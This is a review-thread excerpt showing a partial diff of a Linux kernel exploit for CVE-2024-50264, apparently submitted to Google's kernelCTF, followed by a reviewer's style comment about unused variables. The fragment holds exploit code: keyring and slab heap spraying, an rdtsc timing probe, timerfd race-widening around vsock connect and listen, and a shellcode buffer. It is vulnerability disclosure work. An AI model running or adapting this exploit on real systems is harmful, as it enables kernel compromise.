pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c

```diff
@@ -0,0 +1,851 @@
+
+	int tfd1 = timerfd_create(CLOCK_MONOTONIC, 0);
+	int tfd2 = timerfd_create(CLOCK_MONOTONIC, 0);
+	int tfd3 = timerfd_create(CLOCK_MONOTONIC, 0);
+	int tfd4 = timerfd_create(CLOCK_MONOTONIC, 0);
+	unsigned long tmp;
+
+	int communicate_pipe[2];
+	char comm_buf[4];
+	pipe(communicate_pipe);
+	int v = random_in_range(1, 10);
+	conn_pid = fork();
+
+	if (conn_pid == 0) {
+		int vv = 0xffff;
+		char desc[16] = {};
+		snprintf(desc, sizeof(desc) - 1, "-%d", ++vv);
+		add_key(KEYRING_TYPE_USER, desc, &payload, KEYRING_KMALLOC_96, KEY_SPEC_PROCESS_KEYRING);
+		
+		int *fds[0x28];
+		for(int i=0; i<0x28; i++) 
+			fds[i] = generate_spray_vvs_fd(OBJS_PER_SLAB);
+		int *checkfd = generate_spray_vvs_fd(OBJS_PER_SLAB);
+		int *remainfd = generate_spray_vvs_fd(OBJS_PER_SLAB);
+		for(int i=0; i<0x20; i++) 
+			spray_vvs(fds[i], OBJS_PER_SLAB);
+
+		uint64_t times[OBJS_PER_SLAB];
+		uint64_t t0, t1;
+		snprintf(desc, sizeof(desc) - 1, "-%d", ++vv);
+		key_serial_t keyv;
+		for(int i=0; i<OBJS_PER_SLAB; i++)
+		{
+			spray_vvs(&checkfd[i], 1);
+			sched_yield();
+			t0 = rdtsc_begin();
+			keyv = create_keyring(KEYRING_TYPE_USER, desc, &payload, KEYRING_KMALLOC_96, KEY_SPEC_PROCESS_KEYRING);
+			t1 = rdtsc_end();
+			times[i] = t1-t0;
+		}
+
+		// for(int i=0; i<OBJS_PER_SLAB; i++)
+		// 	printf("%d: %d\n", i, times[i]);
+
+		int inuse = -1, currv = 0;
+		for(int i=OBJS_PER_SLAB-1; i>=0; i--)
+			if(times[i] > 5500)
+			{
+				inuse = OBJS_PER_SLAB - i;
+				break;
+			}
+		
+		printf("inuse: %d\n", inuse);
+		usleep(10000);
+
+		for(int i=inuse; i<OBJS_PER_SLAB-1; i++)
+			spray_vvs(&remainfd[i], 1);
+		
+		remove_keyring(keyv);
+		// spray_vvs(&remainfd[OBJS_PER_SLAB-1], 1);
+
+		write(communicate_pipe[1], "123", 3);
+		struct itimerspec it = {};
+
+		it.it_value.tv_sec = 0;
+		it.it_value.tv_nsec = v * (NS_PER_JIFFIE/100);
+		FAIL_IF(timerfd_settime(tfd1, 0, &it, NULL) < 0);
+
+		read(tfd1, &tmp, sizeof(tmp));
+
+		connect(socket_b, (struct sockaddr *)&connect_addr, sizeof(connect_addr));
+
+		exit(0);
+	} else {
+		read(communicate_pipe[0], comm_buf, 3);
+		struct itimerspec it = {};
+
+		it.it_value.tv_sec = 0;
+		it.it_value.tv_nsec = v * (NS_PER_JIFFIE/100);
+		FAIL_IF(timerfd_settime(tfd2, 0, &it, NULL) < 0);
+
+		read(tfd2, &tmp, sizeof(tmp));
+
+		kill(conn_pid, SIGKILL);
+		wait(NULL);
+	}
+
+	// sleep(1);
+
+	listen_pid = clone(race_thread, stack + 0x100000, CLONE_VM | SIGCHLD, NULL);
+
+	_pin_to_cpu(MAIN_CPU);
+	unsigned long long begin = get_jiffies();
+	struct itimerspec new = {.it_value.tv_nsec = 1500000};
+	timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
+	
+	connect_addr.svm_cid = 0;
+	connect(socket_b, (struct sockaddr *)&connect_addr, sizeof(connect_addr));
+	write(communicate_pipe[1], "123", 3);
+	do {
+		listen(socket_b, 0);
+	} while (get_jiffies() - begin < 25);
+
+	printf("pte spray fin\n");
+	
+	wait(listen_pid);
+	return 0;
+}
+
+char shellcode[0x1000];
+int heap_spraying(void *arg)
+{
+	union key_payload payload = {};
```

Comment:
These variables seems to be unused. Please remove unused code: https://google.github.io/security-research/kernelctf/style_guide#unused-code